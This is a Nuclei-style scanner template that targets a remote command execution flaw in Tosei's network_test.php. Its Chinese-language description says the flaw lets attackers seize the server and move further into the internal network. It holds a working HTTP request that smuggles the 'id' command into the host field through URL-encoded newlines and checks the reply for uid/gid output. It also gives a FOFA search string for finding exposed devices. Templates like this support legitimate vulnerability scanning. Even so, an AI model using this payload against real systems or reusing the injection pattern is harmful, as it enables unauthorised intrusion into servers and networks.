http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /cgi-bin/login.php/cgi-bin/network_test.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: application/x-www-form-urlencoded

          host=%0aid%0a&command=ping
id: Tosei-network_test_php-RCE
info:
    author: Superhero
    description: |-
        fofa: body="tosei_login_check.php"
        Tosei network_test.php 存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
    name: Tosei network_test.php 远程命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/18FvJ9NbGhG-OncYiwct9Q
    severity: high
    tags:
        - RCE
